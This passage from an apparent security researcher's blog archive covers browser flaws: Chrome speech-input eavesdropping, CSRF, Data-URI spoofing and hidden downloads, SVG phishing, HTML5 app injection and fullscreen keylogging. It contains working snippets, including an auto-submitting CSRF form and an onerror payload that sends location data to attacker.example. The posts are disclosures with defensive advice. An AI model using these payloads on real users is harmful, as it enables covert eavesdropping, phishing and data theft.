Category Archives: Security

To Listen Without Consent – Abusing the HTML5 Speech

tl;dr;
I found a bug in Google Chrome that allows an attacker to listen in on the user's speech without any consent and without any indication. Even blocking all access to the microphone under chrome://settings/content will not remedy this flaw.

Try the live demo… (Designed for Mac, though it will work similarly on any other OS)

Watch the video…


The Sisyphus of computer science

Speech recognition is like the Sisyphus of computer science. We have come a long way but still haven't reached the top of that hill. With all that crunching power and sophisticated algorithms, computers still can't recognise some basic words and sentences, the kinds that the average human digests without breaking a sweat. This is still one of the areas where humans easily win over computers. Savor these wins, as they will not last much longer ;)

One must appreciate Google for pushing this area forward and introducing speech recognition into the Chrome browser. The current level of speech support in Chrome allows us to create applications and websites that are completely controlled by speech. It opens vast possibilities – from generally improved accessibility to email dictation and even games.

The current speech API is pretty decent. It works by sending the audio to Google's servers and returning the recognised text. The fact that it sends the audio to Google has some benefits, but from an application point of view it will always suffer from latency and will not work offline. I believe the current speech support was introduced with Chrome 25. From Chrome 33 one can also use the Speech Synthesis API – amazing!

But…
Before this fine API we currently have, Google experimented with an earlier version of the API. It works much the same; the main difference is that the older API doesn't work continuously and needs to be restarted after every sentence. Still, it's powerful enough, and it has some flaws that enable it to be abused. I believe this API was introduced with Chrome 11, and I have good reason to believe it has been flawed since then.


More Technical Details

Basically, this attack abuses Chrome's old speech API, the x-webkit-speech feature.
What enables this attack are these three issues:

  1. The speech element's visibility can be altered to any size and opacity, and it stays fully functional.
  2. The speech element can be made to take over all clicks on the page while staying completely invisible. (No need to mess with z-indexes.)
  3. The indication box (which shows you that you're being recorded) can be obfuscated and/or rendered outside of the screen. (A minimal sketch combining these issues follows below.)
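For illustration only, here is a minimal sketch (not the original PoC) of the idea behind the first two issues: the old speech input is blown up and made fully transparent, so an innocent-looking click lands on the invisible microphone button and starts recording. The x-webkit-speech attribute and the webkitspeechchange event belong to the old Chrome API; the exact sizing and behaviour depend on the Chrome version.

<!-- Invisible speech input, scaled so its microphone button covers the click target -->
<input x-webkit-speech id="mic"
       style="position:fixed; top:0; left:0;
              font-size:300px; opacity:0; border:none;" />
<script>
  // When recognition finishes, the recognised text lands in the input's value.
  document.getElementById("mic").addEventListener("webkitspeechchange", function () {
    console.log("overheard: " + this.value); // an attacker would send this to their server
  });
</script>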

The PoC is designed to work on Chrome for Mac, but the same attack can be made to work with Chrome on any OS.

This PoC uses full-screen mode to make it easier to hide the "indication box" outside of the screen.
Using HTML5 full-screen is not mandatory; it's just easier for this demo.

As you can see in the demo and video, there is absolutely no indication that anything is going on. There are no other windows or tabs, and no hidden popup or pop-under of any kind.
The user will never know this website is eavesdropping.

In Chrome, all one needs in order to access the user's speech is this line of HTML5 code:
<input x-webkit-speech />

That's all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the "indication box" telling him to "Speak now", but that can be pushed out of the screen and/or obfuscated.

That is enough to listen to the user's speech without any consent and without giving any indication. The other bugs just make it easier, but they are not mandatory.

(For the tree in the demo I used a slightly altered version of the beautiful canvas tree by Kenneth Jorgensen.)

— The bug was reported to Google.

[Screenshot: the little grey microphone icon]

Found a CSRF Flaw in a Big E-Commerce Website

tl;dr

I stumbled upon some CSRF flaws in a very popular e-commerce website. CSRF flaws are generally overlooked, and the only way for you as the user to minimize the risk is to log out from a website after you finish using it. This limits the window of vulnerability to the time you spend on the website. I have disclosed my findings to the e-commerce website and will post them here after they finish fixing them.


This is how these CSRF flaws generally work

When you log in to a website you get back a cookie that indicates who you are and the fact that you are authenticated.
Now, for a better user experience and so you won't need to re-login, most websites tell your browser to keep the cookie for a very, very long time (up to 10 years is considered safe).
The problem is that if a website suffers from any CSRF flaws, and many still do, from now on every time you visit any unrelated internet content it may be attacking you. Think of all the slightly phishy content you've stumbled upon over the past years; some of it could have been attacking you.
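To make the mechanism concrete, here is a minimal sketch of a classic CSRF attack page. The target URL and field names are hypothetical; the point is that the victim's browser attaches the long-lived session cookie automatically, so the forged request is processed as if the user had made it.

<!-- Hosted anywhere: an ad, a "phishy" blog, anything the logged-in victim visits -->
<form id="csrf" action="https://shop.example.com/account/change-email" method="POST">
  <input type="hidden" name="email" value="attacker@evil.example" />
</form>
<script>
  // Submits silently as soon as the page loads; the browser sends the
  // victim's cookies along with the request.
  document.getElementById("csrf").submit();
</script>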

A famous CSRF attack against a bank used a legitimate ad and abused a flaw in the bank's website to transfer users' money. Gmail suffered from a CSRF flaw in its early days, leaking all of its users' contacts.

CSRF flaws are used to steal sensitive data from users and to perform actions on the user's behalf. The flaws I found enable both – an attacker can steal the user's personal data and also mess with their assets.


How I stumbled upon it

I was surfing on an open public WiFi – generally a bad thing to do, but I needed to. This public WiFi had a phishy name, "eyes2", and there were a few other "eyes" circling around – "eyes1", "eyes2", "eyes3", etc. Call me paranoid, but it seems to me that these access points were put there in order to eavesdrop. Might be just for fun, might be more. Anyhow, I generally don't care as long as I keep all of my traffic in SSL; I don't mind them getting my metadata. So I went to this huge e-commerce website just to check something and was amazed that it's not all SSLed. Wow… I wondered… what kind of data have I just leaked to the MITM at the "eyes2" access point?! Apparently, if someone was eavesdropping on my connection they now knew exactly who I am, and more.

The fact that a website dealing with even slightly sensitive data doesn't use SSL for all of its traffic is a flaw on its own. But SSL is not related to these specific flaws; in fact, using SSL doesn't help prevent CSRF flaws. It's only because I wanted to know exactly what kind of data this website leaked by using plain HTTP instead of HTTPS (SSL) that I found out it's also vulnerable to CSRF attacks.


Where are all the details?

I reported my findings to the e-commerce website. It took me way longer to find the appropriate way to contact them than to find the flaws and PoC them. I did eventually manage to report it, and they were very responsive and seemed to have already started fixing it. I will post all the details after they finish fixing it.

As a website owner, it's important to remember to implement CSRF prevention from the get-go. Most web frameworks already have their own solutions. It's very easy to overlook; it's very easy to use something like JSONP and forget how vulnerable it can be, for example.
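For illustration, here is a minimal, framework-agnostic sketch of the synchronizer-token pattern that most of those framework solutions implement (the function names are hypothetical): a random per-session token is embedded in every form and checked on every state-changing request, and since a cross-site page can't read or guess it, forged requests fail.

// Plain Node-style JavaScript; assumes some server-side session object per logged-in user.
const crypto = require("crypto");

// On login: generate a random token, keep it in the server-side session,
// and embed it in every rendered form as a hidden field.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString("hex");
  return session.csrfToken;
}

// On every state-changing request: reject it unless the submitted token
// matches the one stored in the session.
function verifyCsrfToken(session, submittedToken) {
  return typeof submittedToken === "string" &&
         submittedToken === session.csrfToken;
}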


How to protect yourself

CSRF generally relies on cookies, so what you can do to protect yourself is to log out or delete your cookies after you finish using a website. That won't be bulletproof, since you'll still be vulnerable to attacks while you're logged in. The only way to be completely safe is to use only one window with only one tab while you are logged in.

Obviously all of this is a complete hassle, and website owners should be the ones responsible for their CSRF flaws. The user can’t be expected to do it.

If you're using Firefox you can use something like NoScript, which also involves some level of annoyance.

Abusing The HTML5 Data-URI

[Update: Some of these examples were mitigated in Chrome 38 and 39]

After seeing in the previous post how Data-URIs can be used as a mechanism to easily carry malicious code, I'll elaborate more on the issues they present.

Some of these issues merely stem from the way Data-URIs are designed and implemented, and some might be considered security bugs in the browsers.

Using Data-URI to manipulate the address bar

The simplest thing an attacker can do is add spaces after the "data:" in the URI, and by that make it look like some kind of Chrome internal page.

It will also change the link status at the bottom of the browser. The link will show "data:", hiding all the base64 code that is there. It's a way to manipulate the status bar without the need for JavaScript; hence the link will be manipulated even in an environment that doesn't allow JavaScript.
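Here is a minimal sketch of the trick (the SVG payload is harmless and the amount of padding is arbitrary; whether the spaces are still accepted depends on the browser version, and per the update above this was mitigated in Chrome 38/39):

<script>
  // Build a data: link whose visible prefix is padded with spaces, so the
  // address bar and status bar show little more than "data:".
  var svg = '<svg xmlns="http://www.w3.org/2000/svg"><text y="20">hi</text></svg>';
  var padding = " ".repeat(300);   // pushes the payload out of sight
  var uri = "data:" + padding + "image/svg+xml;base64," + btoa(svg);

  var a = document.createElement("a");
  a.href = uri;
  a.textContent = "Looks like an internal data: page";
  document.body.appendChild(a);
</script>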

Combine that attack with the previous example of the phishing SVG and you can get catastrophic results. Lots of users might believe this is an internal Chrome page.

Live example (Open in Chrome)

[Screenshot: Chrome address bar showing the space-padded data: URI]

In the above example the user will see only "data:.." in the address bar, but if they feel uncomfortable they can still examine the address bar and might find the hidden base64 code.

The next example shows how to prevent the user from examining the address bar at all; it will always show just "data:". The three dots indicating there might be more to it will be removed as well.

By making the original content larger than ~28KB, the address bar will always show "data:" and nothing else.

[Screenshot: status bar showing only "data:"]

Live example of only data in the address-bar (Open in Chrome)

[Screenshot: address bar showing only "data:" for a large Data-URI]

While Chrome is the most vulnerable to the Space attack, other browsers will fall for it too.

Firefox trims the spaces when you click on the link, but an attacker can still manipulate the status bar (at the bottom of the browser), as we'll see in the next vector.

Safari doesn't trim the spaces but instead converts them to %20 or any other Unicode-escaped representation of a space. It'll work with any combination of Unicode spaces.

[Screenshot: Safari address bar with the spaces escaped as %20]

Mobile Chrome for iOS: it was a bit surprising to see that Chrome for iOS also falls for the "over 28KB of base64" attack.

[Screenshot: Chrome for iOS address bar showing only "data:"]

It's interesting to see that even Chrome for iOS, which is a very different environment, shares the shell code with all of the other Chrome browsers.


Tricking the user into downloading malicious content using the Data-URI

We've already seen how one can abuse the browser's address bar and status bar by simply adding spaces after the "data:" in the link.

But what if we add some other character, other than a space? In that case the user will be prompted to download a file (by default the user won't even be prompted and the file will just download).

How convenient for an evil one. Combining that with the previous stuff…

The user will see data:http://google.com/graphics/doodle.svg in the status bar; clicking the link will automatically download the attacker's malicious SVG file that is hidden in the base64 code inside the link.

[Screenshot: Chrome status bar showing data:http://google.com/graphics/doodle.svg]

Click to download doodle.svg (not really a doodle)

As noted before, Firefox trims the spaces after the "data:", but one can use %20 instead. Also, Firefox does a good job and puts an ellipsis in the middle of the link in the status bar, so the user will see the suspicious base64 gibberish at the end. But that can easily be overcome by simply adding spaces at the end of the link as well.

[Screenshot: the same doodle.svg link in the Firefox status bar]

Click to download doodle.svg (FireFox version)

The interesting thing is that this kind of attack doesn't limit us to SVG; any kind of file, including any kind of binary, can be downloaded this way.

How about an EXE? (That EXE does nothing but echo some text to the terminal.)
(Will add it later)

Remember COM executables? Only a few bytes; 32-bit Windows will still run them, and many of these are still out there.

COM executable

ZIP is a great bad vector IMHO

ZIP with baddies inside (not real baddies, just text files)

[Screenshot: Chrome downloading the ZIP from a data: link]

While on Windows an attacker will also need to trick the user into changing the file's extension or into opening it with a certain app via "Open With…", on the Mac these extensions don't matter much.

The file will be opened or executed according to its real type.

The new Mac OSes have this great feature called Gatekeeper that makes running applications way more secure in general.

The default setting is "from the App Store AND identified developers". How difficult is it for a motivated attacker to become an "identified developer"?

If the user has disabled Gatekeeper, the app will just run when clicked.

It will probably work on old Macs, but anyway I think the most dangerous attack is using just a ZIP file with all kinds of baddies inside.

The user flow might be:

  1. Click on a link -> the file is immediately downloaded (there is no wait, as the file is already embedded in the page).
  2. Click on the downloaded file -> the file is automatically extracted (if the ZIP is small enough the user won't notice much going on, as the extraction will be fast).
  3. Malicious apps will be spread all over the user's Downloads folder.
  4. "Hopefully" one day the user will notice these apps and their inviting names and will run one of them – thinking they downloaded it themselves.

These are most of the browsers I've tested on; other browsers may behave differently. Generally it works the same on Ubuntu as well.

IE (Internet Explorer) does not suffer from most Data-URI flaws – it achieves this by not supporting most of their features. I don't think that getting away with it by not supporting them is generally a good thing.

Final notes about these vectors: (repeating some from the previous post)

  1. Remember that no JavaScript is needed for any of this; all that is needed is a link. It'll work just the same with JavaScript disabled.
  2. No server is involved either.
  3. All an attacker needs is a bunch of strings, and the user's browser will do all the rest.
  4. AV won't scan these links.
  5. Not easily blockable – no domain to block.
  6. More easily shared and distributed.
  7. The attack is also cached in the browser history and doesn't need an Internet connection to be present at the moment of the attack.
  8. Will propagate across devices. For example, if you're signed in to Chrome the attack will propagate to all of your devices. (You'll still have to run it on each device though; just type data in the address bar.)
  9. Can be easily embedded in an innocent-looking *.URL file. Who doesn't click on these? It always felt safe.

 

— Reported the bug to Google.

SVG For Fun and Phishing

What an awesome format SVG is, so powerful and so well supported by browsers. And yet it is barely used; it's not getting the love it deserves. Well, browsers love SVG, perhaps too much…

SVG files are like little bundles of joy, encapsulating graphics, animations and logic. One can write a full app or game, all encapsulated in one SVG file. That SVG file can be compressed into a binary file with the SVGZ extension and browsers will still accept it.

It's way less powerful than Flash, but the concept is similar – vector graphics and logic in one file. And like Flash SWF files, these files tend to go viral and get redistributed. By that I mean that once you release your attack into the wild it can get hosted on many other servers. A good example would be tiger.svg.

Remember the lovely Flash dog? It can work just the same, and even worse.

SVG also runs from local files. By default on Windows, SVG files are opened in IE, which will run the script with local privileges when the file is double-clicked.

Anyhow, SVGs have some flaws built into them; many are known, some are new. I will argue that even without the new flaws an SVG file is somewhat dangerous by design. I wanted to see how easy it would be to abuse SVG for phishing, so I picked an easy target – Chrome's "Sign In" page. It was pretty easy to create an almost fully functional version of the Chrome Sign In page.

Check it out – only 5KB of SVG "image"

Compressed as SVGZ, only 2KB (Chrome will run it just fine)

Note: Google has already changed the appearance of this page, but it is almost identical to the previous version.

The real page generally lives here (Google has already changed the way it looks).

Letting SVG files execute JavaScript is actually the root of the problem. I'm not sure it serves any real purpose on today's web.
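To see why, here is a minimal sketch of a file that looks like an "image" but runs JavaScript the moment it is opened in a browser (a real phishing SVG would draw a login page and post the credentials somewhere):

<svg xmlns="http://www.w3.org/2000/svg" width="300" height="100">
  <text x="10" y="50">Just a harmless picture…</text>
  <script type="text/javascript">
    // Runs with the privileges of wherever the SVG is viewed from:
    // a website, a data: URI, or a local file opened in the browser.
    alert("script inside an 'image'");
  </script>
</svg>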

A simple attack might go like this:

  • The attacker sends the victim an email with a malicious SVG file: "Check out this cool image / animation".
  • The victim downloads the SVG and clicks / double-clicks on it.
  • The SVG is opened in the browser.
  • The attack takes place.

The JavaScript that runs will have local privileges and can easily attack the user (limited to the browser sandbox, of course). It can, for example, execute multiple cross-domain CSRF attacks (cookies are sent normally with every request) and/or load multiple other attack vectors. It can be abused for spam, and that is not even illegal as long as the attacker doesn't do anything too malicious.

You may be thinking "so what?!" – you can script the user from an HTML page just as well.

There are a few differences, as most users look at an SVG file as just another image.

  1. When you double-click on an image to view it, it can't execute anything – an SVG can.
  2. SVG files get redistributed – there are numerous clip art sites that will host the evil SVG for the attacker.
  3. The malicious code embedded in an SVG file can survive editing the file in graphics editors like Adobe Illustrator and Inkscape.

I would say that the main problem here is not what SVG files are capable of doing; it's more about the way they can let malicious code slip through the user's normal defenses.

Wait, there is more…


Even more fun with SVG and HTML5 Data-URI

Another great feature of HTML5 is the Data-URI. Now, SVG works great with Data-URIs; malicious SVG works amazingly great with Data-URIs.

SVG encoded as base64 will run directly from a link.
Some might call this a feature, but it can be exploited for phishing attacks.

PoC of an SVG phishing attack embedded in an HTML5 Data-URI

Some of the attacker's benefits are:

  1. This is just a link, no need to host anything.
  2. AV won’t scan these links.
  3. Not easily blockable – no domain to block.
  4. More easily shared and distributed.
  5. The attack is also cached in the browser history and doesn't need an Internet connection to be present at the moment of the attack.
  6. Will propagate across devices. For example, if you're signed in to Chrome the attack will propagate to all of your devices. (You'll still have to run it on each device though; just type data in the address bar.)
  7. Can be easily embedded in an innocent-looking *.URL file. Who doesn't click on these? It always felt safe.

Everything said here is valid for all Data-URI supported formats; notably also text/html:
Here is an example

Actually, Data-URIs have their own set of problems, which are not necessarily related to SVG. They work perfectly with SVG, but the issues are more general. I'll elaborate more in another post.

More about the demo (Chrome Sign In)

I don't want to give too many ideas to the bad guys, but the possibilities here are endless; I can already think of far nastier vectors than this demo.

This specific demo includes an image of the Google logo. I managed to create the Google logo as an SVG in about 7KB, but the Google logo in the demo is small and not too noticeable anyway; it felt like a waste of KBs.

I found that the font used by Google for their logo is Catull, which is an old-style serif typeface and is similar to… you guessed it… Georgia. That was good enough, and Georgia is preinstalled on all OSs.

I know that might look horrible to font and aesthetics lovers, but the average victim will easily fall for it.

One of the most important features of this attack is the SVG text-input. The user needs to enter their credentials somewhere.

Text-inputs are not natively available in SVG, though there were some attempts to create them.

I didn't create fully functional text-inputs; I didn't think it was appropriate for me to do so at this point, for various reasons. For one, I didn't want to make it too easy to replicate this attack in the real world. I'm sure that nearly perfect SVG text-inputs can be created relatively easily – one just needs enough motivation.

What about mobile?

Smartphones are just fine with SVG, more on that later as well.

Some tips to keep you safe

  1. Be alert when clicking on links that lead to SVG files or Data-URIs.
  2. Don't double-click on SVG files to preview them in your browser.
  3. Don't preview unknown or unchecked SVG files in your browser.
  4. Don't export an SVG from Adobe Illustrator or Inkscape without knowing where it came from and making sure it has no malicious script.

Protecting Your Smart Phone, the Basics

iPhone

  1. Don't jailbreak; a non-jailbroken iPhone is a pretty secure device.
  2. Use a PIN code: Settings -> General -> Passcode (and not something like 1234).
  3. Make sure data is really encrypted – it's the default since the iPhone 4 (which has hardware encryption). If you have an older model, go to Settings -> General -> Passcode and look for "Data protection is enabled" at the bottom.
  4. Don't install any profiles you're not absolutely sure about. I saw that some ad companies have started to use these profiles in order to get around App Store restrictions. If you see something like this, don't approve it unless you're absolutely sure. Here's some more info about the danger of malicious profiles.
  5. Consider using an alphanumeric passcode by setting "Simple Passcode" to "Off".
  6. Consider not using "Find My iPhone". This is a trade-off: "Find My iPhone" is a really great tool for finding your lost phone, but there is a single point of failure, which is your Apple ID. Accessing it gives attackers your exact position and an easy way to wipe all of your phone's data.

Android

  1. Don't root your phone.
  2. Use a screen lock.
  3. Encrypt data – works better from Android 4.0 and above, and might affect performance (it does not encrypt the external SD card).
  4. Use a security app like Lookout or Avast – it's free!
  5. Don't install an app unless you have a decent amount of confidence in it, and check the permissions it requires. Remember to uninstall it if it's useless.

We all know that Android is open and its apps need no approval, which makes it more vulnerable by nature. This openness has another aspect of vulnerability: external SD cards vary in quality, and because of that the Android OS doesn't encrypt them – it can't promise good enough performance on cheap external memory. Which makes sense in a way; you're somewhat compromising security by being open.

Windows Phone 8
I've never had a Windows Phone 8, only 7.5, but it's obvious that Microsoft is betting big on their most loyal enterprise customers, who need enterprise security. From reading online it seems that it has built-in encryption, but not for the SD card (same as Android).

Common sense still applies.

  1. Use a screen lock.
  2. Encryption is built in for you, just don’t save anything important on the external SD card.

HTML5 Mobile Apps – Injection Heaven, Security Hell

Three weeks ago Path.com was fined for stupidly stealing their users' contact lists and saving them onto their servers. What Path did was obviously wrong, but I'm not sure their punishment was really justified – having to pay this enormous fine to the FTC, using COPPA as an excuse. The lesson here is to always comply with COPPA.

Anyhow, in that same TechCrunch article you can also find that "The FTC also took the opportunity to introduce a new set of guidelines for mobile developers". Although they explain early in that article that it's not meant to be a guideline, I still feel it misses a lot.

When it comes to HTML5 apps, even the simplest app can greatly compromise the user's privacy and security. Take the FTC's example of a simple and harmless alarm clock app: if that app is built using HTML5, its size and complexity don't matter. All that is needed is one JavaScript injection that passes through.

How will that code be injected, you may ask? All that is needed is for the app to load some content from a remote server. The simplest example is the "Terms and Conditions" page, which is usually loaded into a WebView. It can be something more "complex", like settings – choosing a favorite color or loading the saved alarms. Any kind of sharing will probably be even more open to exploitation, e.g. "share your favorite alarms". Push messages might also bring malicious code. Etc.

The bottom line is that any injection of JavaScript gives an attacker a lot of control over the device, and more often than not it will be persistent. HTML5 apps usually use localStorage, which is rarely flushed, and leverage native DBs and the file system. The "page" or WebView is rarely refreshed, so even if the injection is not persistent it will stay alive for a long time.
Things like stealing the user's contact list and tracking the user's location are pretty common – these capabilities are enabled by default in PhoneGap for iPhone, for example.
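As an illustration, here is a minimal, hypothetical sketch of the kind of injection described above: an HTML5 alarm app drops a server-supplied string straight into its WebView's DOM, and a single onerror payload is enough to run script with whatever the app has exposed to JavaScript. The safe version treats server data as text, never as markup.

<ul id="alarms"></ul>
<script>
  // Vulnerable: server-supplied text is inserted as markup.
  function renderAlarm(labelFromServer) {
    // If labelFromServer is, say:
    //   <img src=x onerror="navigator.geolocation.getCurrentPosition(function (p) {
    //     new Image().src = 'https://attacker.example/?lat=' + p.coords.latitude; })">
    // the handler runs inside the app's WebView, with access to whatever
    // native bridge (PhoneGap/Cordova plugins, etc.) the app has exposed.
    document.getElementById("alarms").innerHTML += "<li>" + labelFromServer + "</li>";
  }

  // Safer: treat the string as plain text, so no markup is ever parsed.
  function renderAlarmSafely(labelFromServer) {
    var li = document.createElement("li");
    li.textContent = labelFromServer;
    document.getElementById("alarms").appendChild(li);
  }
</script>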

It's only limited by the native API that is exposed to JavaScript, and generally that's very open, even more than the default PhoneGap API. I know of at least one popular HTML5 app that exposes almost all of the Android native API.

You see, JavaScript is one tough beast – it can run almost anywhere.
JavaScript was basically designed as an unimportant sidekick to the browser's HTML: "it should not cause any problems by being poorly written, it should fail silently and not interfere with the main thing, which is HTML." Seriously, that's how it was; we're lucky it's not case-insensitive. I'm sure back then some people thought that would make it simpler and better.
So JavaScript will run in any DOM element, no matter how naive you may think it is, and it will run in unexpected parts of the element without needing the <script> tag, e.g. onerror="attack()". It used to even run from CSS and from images, but we're past that now, AFAIK, in mobile browsers.

As opposed to that, it takes a very special case for an injection to be able to execute arbitrary native code. You can make a native Android app that will run anything – even get root – but I doubt that any legitimate app regularly downloads strings and runs them as commands. (Basically, on a rooted Android you can do exec("su") and everything else.)

With JavaScript the app does not need to be designed in any special way; an unsanitized string is likely to execute.

These kinds of injections are not solely a problem of PhoneGap-based applications.
In any app that uses HTML5, even if it's mostly native, any API that is exposed to JavaScript can be leveraged by an attacker.

PhoneGap (Cordova) has a mechanism for whitelisting remote hosts, which is really only effective on iOS. It adds a little bit of security, but many apps use a wildcard "*" to allow all hosts anyway. The wildcard is used by default in the PhoneGap cloud service (the SaaS solution for building PhoneGap apps).
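For reference, that whitelist lives in the app's config.xml as <access> elements; the permissive default versus a tighter, per-host entry looks roughly like this (the host name is hypothetical):

<!-- The permissive default many apps ship with: any remote host is allowed. -->
<access origin="*" />

<!-- A tighter alternative: whitelist only the hosts the app actually needs. -->
<access origin="https://api.myalarmapp.example" />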

As you can see, the options for an attacker are enormous; all it takes is one injection vector and there is an open path (no pun intended) to take over all of the devices of all of the users.

HTML5 apps that run inside the mobile browser are also a nice target for injection attacks. Although the browser lacks most of the native API, there is still access to location in all mobile browsers. It's less powerful for the attacker, since the browser will prompt the user much more vigorously.
The Dolphin Mobile Browser implements the full PhoneGap native API, for example (which is generally a good thing), but it makes in-the-browser websites and apps more exposed to attacks.

So what to do, then?!
– Sanitize, sanitize, sanitize all user input, server and client!

Say What, Flash is More Secure Than HTML5?!

So my favorite script kiddie and copycat, Feross (copied, note the shameless "I discovered" in his Quora post, LoL),
found a social engineering flaw in the HTML5 fullscreen mode that can be used for phishing attacks. This time it might even be his own finding… what do you know ;)

This flaw is very similar to the well-known and very old picture-in-picture attack:
Picture-in-Picture Phishing Attacks and Operating System Styles
More info…
IMHO the old version is still way more dangerous for phishing.

So how is Flash more secure?

What enables this HTML5 fullscreen flaw to exist in its prime is the fact that you have full keyboard access. This way an attacker can more easily steal the user's credentials.
After all, fullscreen has existed in Flash for many years now, yet it was never compromised this way. The main reason Flash is more secure is that it does not allow full keyboard interaction in fullscreen.

Good thinking, Adobe, taking care of our security… oh wait… Flash added this feature in version 11.3… after all, Flash can't be left behind…
Working demo…

Damn… but still, Flash gives you a decent popup confirmation, which HTML5 doesn't.

Yeah, I know Chrome gives you a popup too, but you don't have to click on it to get FULL keyboard access.
I constructed this "amazing" demo here (Chrome only); as you can see, you get the message but the keyboard is fully functional and accessible through JavaScript.
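A minimal sketch of the behaviour described above: enter HTML5 fullscreen on a user click and log every key, without any extra confirmation click. (The prefixed webkitRequestFullScreen / ALLOW_KEYBOARD_INPUT form matches the Chrome builds of that era; modern browsers use the unprefixed requestFullscreen().)

<script>
  document.addEventListener("click", function () {
    var el = document.documentElement;
    if (el.webkitRequestFullScreen) {
      // Old WebKit: explicitly request keyboard input in fullscreen.
      el.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT);
    } else if (el.requestFullscreen) {
      el.requestFullscreen();
    }
  });

  document.addEventListener("keydown", function (e) {
    // A phishing page would collect these keystrokes instead of logging them.
    console.log("key pressed: " + e.key);
  });
</script>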

So still Flash is more secure than HTML5 – in that respect.

It takes us back to what I and others have been preaching: with great power comes great responsibility.
HTML5 has its own flaws, and the more powerful it becomes the more it will get.

Stay tuned…

Webcam ClickJacking Revived

Two weeks ago this guy managed to revive my 3-year-old Webcam ClickJacking PoC, and also managed to revive some of the buzz surrounding it.

The revived attack is exactly the same as my 2008 PoC; it even uses lots of my code. The difference is that instead of using the Settings Manager HTML page as the source of the iframe, it now uses the Settings Manager SWF directly. Actually, this was the first thing I tried after Adobe frame-busted the Settings Manager pages. It didn't work well in my Windows browsers, so I ditched it. One of the first comments on my Webcam Clickjacking post created the same thing and gave a link to it (it now links to an ad). So obviously everyone knew about it, or at least thought about it – everyone except Adobe.

The Flash Player provides great power on the web; it's still the only practical means of interacting with the user's webcam and microphone. You know the cliché: with great power comes great responsibility. Adobe needs to be vigilant when it comes to its users' security and privacy, and its users are practically everyone.

Obviously, every new version of the Flash Player should go through rigorous security testing. It also needs to be done with every new browser and OS version. That's a huge matrix, but it needs to be done. For example, browsers change the way they embed plugins, which can easily lead to flaws even if the Flash Player stays the same.

Back then Adobe knew about ClickJacking beforehand, because they were informed by RSnake and Jeremiah Grossman. They didn't know specifically about my PoC and the way it exploits the Settings Manager, but they should have at least frame-busted every related page. It's insane that in all of these 3 years no one bothered to at least Flash-bust the Settings Manager SWF and prevent the resurrection of my PoC.

BTW, good job Feross Aboukhadijeh, my name is Guy Aharonovsky – whois is easy…

John Smith’s younger brother, Adam

Update: YouTube has revived my video. You can now watch Webcam Clickjacking as much as you like.

Remember ClickJacking? The generic flaw in web browsers and HTML. Remember Webcam Clickjacking? My PoC showing how this flaw can be used to take control of a victim's webcam and mic.

Well, my PoC, to my surprise, created a lot of buzz when I published it, and the related YouTube video got 1,220,966 views – most of them from its first day.

[Screenshot: the video's view count]

Yesterday I got an email from YouTube titled "Video removed – Copyright Infringement". At first I thought it was just another spam mail, but looking inside it and then trying to watch my video gave me an alarming red webpage with the bold text "This video is no longer available due to a copyright claim by Adam Smith".

WTF, copyright shmopyright; my video has no sound and is barely a screen capture of my mouse. In fact, I sometimes claim it to be the dullest video with the most views.

My immediate suspect was Adobe, but it made no sense; if they had wanted to, they would have done it when it was hot. Then again, sense and Adobe's legal dept. don't always go together. FlashObject, anyone?

Googling such a generic name as "Adam Smith" gives about 3,570,000 results; apparently it's more generic than "John Doe". Googling "Professor Adam Smith" from Adobe gives some possible options, but it's still not informative enough and too vague.

So who is this Mr. Generic claiming I've stolen his precious copyrights? Maybe he's just a fake dude trying to annoy. Even if he's real, I guess when you have such a generic name you don't mind being hated; nobody is going to correlate your face with your name anyway.

Anyhow, I've filed a counter-notification and hopefully the video will be up again soon. Even if it isn't, I'm sure it'll appear in some other places.

There is a lot of info regarding "my video was removed from YouTube"; just google it if you need to.

There is a lesson to be learned here: one should never trust Google and the like with their important assets. They can get shut down in an instant. Personally I don't care much about this video; I didn't get a dime out of it and its heyday is long gone. But there are cases where people lost all of their income in one day because Google removed their Blogspot-hosted blog, for example.

If you want full control over your videos and such, you should host them yourself, on some remote island. Then again, they'll still be able to cut your cable.

I just wonder where the hell is the decentralized web?! Too few people are controlling too much stuff.

Flash Private Browsing Fixed – Not Good Enough

I was going to congratulate Adobe on their fix to private browsing in Flash; this was my original text:

I'm glad to say that Adobe has fixed the minor issue they had with the new Flash Player 10.1 private browsing. I've written before about how a developer can tell the user's browsing mode.

The Flash Player that is installed with CS5 is 10.1.52.14, which still suffers from this bug. If you surf the web using private browsing mode you should update the Flash Player to the latest version, currently 10.1.53.38 (RC4). Actually, you should update it anyway.

But then I went to see what they had changed in order to fix it. I saw that both modes now have the same limit of 100KB, but they still differ: when trying to save more than 100KB, in normal browsing mode the status is "pending", while in private browsing mode it immediately fails.

Making this demo functional again required changing one line of code. Using any Flash Player from 10.1 beta 2 to the latest 10.1.53.38 (RC4), it should show you whether you're in private mode or not.

So, please, again: normal and private browsing modes should behave exactly the same from a developer's standpoint. Making the local storage limit the same 100KB was a step in the right direction, but it's not enough. Let any Flash content ask for more storage even in private mode and allow the user to accept it; just remember to delete the user's choice along with the local storage.

BTW, it might be possible to trick browsers into telling you the user's browsing mode without Flash at all, using HTML5 localStorage for example.
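A minimal sketch of that idea (behaviour varies by browser and version; some browsers in private mode simply refuse localStorage writes, so a failed write can hint at the browsing mode, much like the Flash trick below):

<script>
  function probablyPrivateMode() {
    try {
      localStorage.setItem("__probe__", "1");
      localStorage.removeItem("__probe__");
      return false;   // write succeeded: likely normal browsing mode
    } catch (e) {
      return true;    // write rejected: likely private browsing mode
    }
  }
  console.log("Private browsing? " + probablyPrivateMode());
</script>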

The updated source code is below:

package {
	import flash.display.Sprite;
	import flash.display.StageAlign;
	import flash.display.StageScaleMode;
	import flash.events.NetStatusEvent;
	import flash.net.SharedObject;
	import flash.net.SharedObjectFlushStatus;
	import flash.text.TextField;
	import flash.text.TextFieldAutoSize;
	import flash.text.TextFormat;
	import flash.utils.getTimer;
	import flash.utils.setTimeout;

	/**
	 * This class will tell the current browsing mode of the user
	 * Tested with Flash Player 10.1 beta 2 - 10.1.53.38 (RC4)
	 * for more info go to:
	 * http://blog.guya.net
	 */

	[SWF(backgroundColor="#FFFFFF", width="400", height="35")]
	public class KissAndTell extends Sprite
	{
		private var _tf:TextField;

		public function KissAndTell()
		{
			initStage();
			createTF();
			setTimeout(saveData, 300);
		}

		private function initStage():void
		{
			stage.scaleMode = StageScaleMode.NO_SCALE;
			stage.align = StageAlign.TOP_LEFT;
		}

		//try to save 140kb into the local storage
		private function saveData():void
		{
